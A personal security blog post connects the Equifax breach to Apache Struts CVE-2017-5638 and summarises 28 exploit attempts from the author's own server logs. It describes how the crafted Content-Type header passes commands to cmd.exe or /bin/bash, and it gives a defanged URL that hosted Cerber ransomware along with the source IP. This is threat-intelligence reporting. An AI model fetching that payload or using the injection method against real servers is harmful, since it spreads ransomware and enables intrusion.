Personal blog. Hobbies: IT, security, privacy, democracy.

Equifax was compromised through Apache Struts (CVE-2017-5638); here are example attack attempts from my own logs

On 15 September 2017, Equifax stated their compromise happened through exploitation of a vulnerability in Apache Struts CVE-2017-5638 — published March 2017 when used in the wild — that involves a crafted Content-Type HTTP request header. For those interested, here are log rules of 28 (untargeted) requests that attempted to exploit this vulnerability on my own blog (which does not run Apache Struts) between 10 March 2017 and 14 September 2017.

The lines are quite long; scroll to right in the grey dialog below. Each line contains a single “#cmd=” that defines a command and a single “#cmds=” (I highlighted those parts in bold below) that feeds the command to cmd.exe on Windows systems and /bin/bash on non-Windows systems. 12 of 28 cases attempt to download & run code; the remaining 16 cases only execute echo “Struts2045” or echo “Amen4Wolves” and seem to be probes for vulnerability. In (only) one case the payload could still be accessed: hxxp://82.165.129.119/UnInstall.exe, which contains Cerber ransomware. So, this was an attempt to distribute ransomware by exploiting CVE-2017-5638; the source was 220.191.231.222, registered to ‘Jinhua Electronic Government Network’.

Employed as technical security consultant at Secura B.V. (formerly known as Madison Gurkha). Guest researcher at University of Amsterdam. MSc in OS3 System & Network Engineering (2005-2006) and PhD in data anonymity (2007-2011) from University of Amsterdam.

Many posts on this blog are scraps of information, published for posterity and reference. Posts prior to Q2/2012 were submitted while I was employed at the University of Amsterdam.